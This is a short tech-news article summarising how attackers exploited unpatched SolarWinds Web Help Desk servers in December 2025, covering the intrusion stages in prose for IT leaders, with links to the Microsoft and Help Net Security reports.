Microsoft and Huntress are warning that attackers exploited unpatched SolarWinds Web Help Desk (WHD) servers to breach organizations in December 2025. The widely used help desk platform is often exposed to the internet, and when critical vulnerabilities go unpatched, it can provide threat actors with a direct entry point into corporate networks.
Researchers say the activity was observed “in the wild,” though it remains unclear whether the same campaign is still ongoing.
In these incidents, attackers exploited one or more critical vulnerabilities in WHD to gain remote access to affected systems. Microsoft has not confirmed which specific flaw was used, but the compromised servers were vulnerable to several high-severity bugs that allow remote code execution.
After breaking in, the attackers used legitimate system tools and remote management software to quietly move deeper into the network and steal high-privilege credentials.
Why It Matters: If attackers gain control of a help desk server that connects to the internal network, they can potentially escalate to full domain compromise. Because the intruders relied heavily on legitimate tools rather than obvious malware, their activity can blend in with normal administrative behavior, making detection more difficult.
- Entry Through Unpatched Vulnerabilities: The attackers targeted SolarWinds WHD servers that were exposed to the internet and had not been updated with the latest security patches. These systems were vulnerable to multiple critical flaws, including issues that allow unauthenticated remote code execution. In practical terms, this means an attacker could send specially crafted requests to the server and execute commands without needing valid login credentials. Because WHD often connects to internal systems and directories, compromising it can quickly provide a bridge from the public internet into the core enterprise network.
- Use of Legitimate Remote Access Tools: Once inside, the attackers installed legitimate remote monitoring and management (RMM) software, including Zoho ManageEngine components. Rather than deploying obvious malware, they relied on trusted administrative tools commonly used by IT departments. This approach provided persistent, hands-on remote control of the compromised system while blending in with normal administrative traffic. Security teams may overlook this type of activity because the software itself is not inherently malicious; it’s the context and timing of its deployment that make it suspicious.
- Built-In Windows Tools Used for Stealth: The attackers also relied heavily on native Windows functionality. They launched PowerShell processes and abused the Background Intelligent Transfer Service (BITS) to download and execute additional payloads. Both tools are legitimate parts of the Windows operating system and are frequently used for routine administrative tasks. This “living off the land” strategy reduces the need for custom malware and helps the attackers avoid triggering traditional antivirus detections, since the activity appears to originate from trusted system processes.
- Credential Theft and Privilege Escalation: After establishing a foothold, the attackers focused on obtaining higher-level credentials. In some cases, they accessed LSASS (Local Security Authority Subsystem Service) memory to extract cached login credentials. At least one observed intrusion escalated further to a DCSync attack, which allows an attacker with sufficient privileges to impersonate a domain controller and request password data for users across the domain. Successfully performing DCSync effectively grants broad control over enterprise accounts, including high-privilege administrative users.
- Persistence Through SSH and Virtual Machines: To maintain long-term access, the attackers set up reverse SSH and Remote Desktop Protocol (RDP) connections. In certain environments, they went a step further by creating a scheduled task that launched a QEMU virtual machine at system startup. This virtualized environment allowed them to run malicious operations somewhat isolated from the main operating system while forwarding SSH access through port tunneling. By embedding their persistence mechanism inside a virtual machine, the attackers added another layer of concealment and resilience against removal efforts.
Go Deeper -> Analysis of active exploitation of SolarWinds Web Help Desk – Microsoft
Unpatched SolarWinds WHD instances under active attack – Help Net Security
Trusted insights for technology leaders
Our readers are CIOs, CTOs, and senior IT executives who rely on The National CIO Review for smart, curated takes on the trends shaping the enterprise, from GenAI to cybersecurity and beyond.
Subscribe to our 4x a week newsletter to keep up with the insights that matter.
